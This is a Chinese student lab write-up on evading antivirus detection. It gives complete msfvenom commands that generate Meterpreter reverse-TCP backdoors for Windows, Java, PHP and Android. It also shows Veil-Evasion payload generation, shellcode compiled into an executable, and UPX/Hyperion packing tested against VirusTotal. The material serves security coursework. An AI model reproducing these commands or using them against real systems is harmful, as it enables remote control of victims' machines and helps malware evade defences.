标签:sign details 特征 使用 ping mic 资源 缺点 com
基于特征码的检测
启发式恶意软件检测
基于行为的恶意软件检测
一般是对恶意软件做处理,让它不被杀毒软件所检测,也是渗透测试中需要使用到的技术。
改变特征码
改变行为
非常规方法
# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.19.128 LPORT=5306 -f exe > msf5306.exe
生成exe文件msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 x > 5306_java_backdoor.jar
生成java后门程序msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 x> 5306_php_backdoor.php
生成php后门程序msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 x> 5306_android_backdoor.apk
生成Android后门程序git clone https://www.github.com/Veil-Framework/Veil-Evasion.git
从github上进行clone下载ls
,cd Veil-Evasion
,ls
,cd setup
,./setup.sh
Y
Next
,Finish
,Accept
Install
list
4 c/meterpreter/rev_tcp
set LHOST 192.168.19.128
(Kali的IP),set LPORT 5306
,options
generate
生成文件,输入payload名字veil53061
veil53061.exe
,小小地开心一哈~msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 -f c
用C语言生成一段shellcodetouch 20165306buf.c
创建一个文件,将刚刚生成的unsigned char buf[]
复制到其中i686-w64-mingw32-g++ 20165306buf.c -o 20165306.exe
生成可执行文件
- 加壳的全称应该是可执行程序资源压缩,压缩后的程序可以直接运行。
- 加壳的另一种常用的方式是在二进制的程序中植入一段代码,在运行的时候优先取得程序的控制权,之后再把控制权交还给原始代码,这样做的目的是为了隐藏程序真正的OEP(入口点,防止被破解)。大多数病毒就是基于此原理。
- 加壳的程序需要阻止外部程序或软件对加壳程序本身的反汇编分析或者动态分析,以达到保护壳内原始程序以及软件不被外部程序破坏,保证原始程序正常运行。
- 这种技术也常用来保护软件版权,防止软件被破解。但对于病毒,加壳可以绕过一些杀毒软件的扫描,从而实现它作为病毒的一些入侵或破坏的一些特性。
- MSF的编码器使用类似方法,对shellcode进行再编码。
- 从技术上分壳分为:
- 压缩壳:减少应用体积,如ASPack,UPX
- 加密壳:版权保护,反跟踪。如ASProtect,Armadillo
- 虚拟机:通过类似编译手段,将应用指令转换为自己设计的指令集。如VMProtect, Themida
给20165306buf.exe
加个壳得到5306_upxed.exe
用virustotal检测如下
将5306_upxed.exe
拷贝到/usr/share/windows-binaries/hyperion/
目录中
进入目录/usr/share/windows-binaries/hyperion/
中
输入指令wine hyperion.exe -v 5306_upxed.exe 5306_upxed_Hyperion.exe
加壳
被Windows自带杀软发现并清除
用virustotal检测如下
veil53061.exe
加压缩壳20165306buf
加密壳,再压缩壳,生成5306buf_Hyperion_upxed.exe
原因:其他进程占用了自己要使用的资源
解决:ps aux | grep "apt-get"
列出所有占用apt资源的进程,sudo kill 进程id
结束其他进程,然后输入指令sudo rm /var/cache/apt/archives/lock
和sudo rm /var/lib/dpkg/lock
。
5306_upxed.exe
拷贝到指定目录下,确保拷贝成功后,再执行下面的指令成功ping通
1.时刻加强防范意识 2.不要轻言放弃,懂得借力≠完全依靠他人。装veil时我参考了许多同学的博客,装了一下午还是失败,本来想拷同学的虚拟机,但出于和自己较劲的心态,终于找到了适合自己的教程并安装成功,有小小的成就感。继续加油呀~
标签:sign details 特征 使用 ping mic 资源 缺点 com
原文地址:https://www.cnblogs.com/5306xyh/p/10626872.html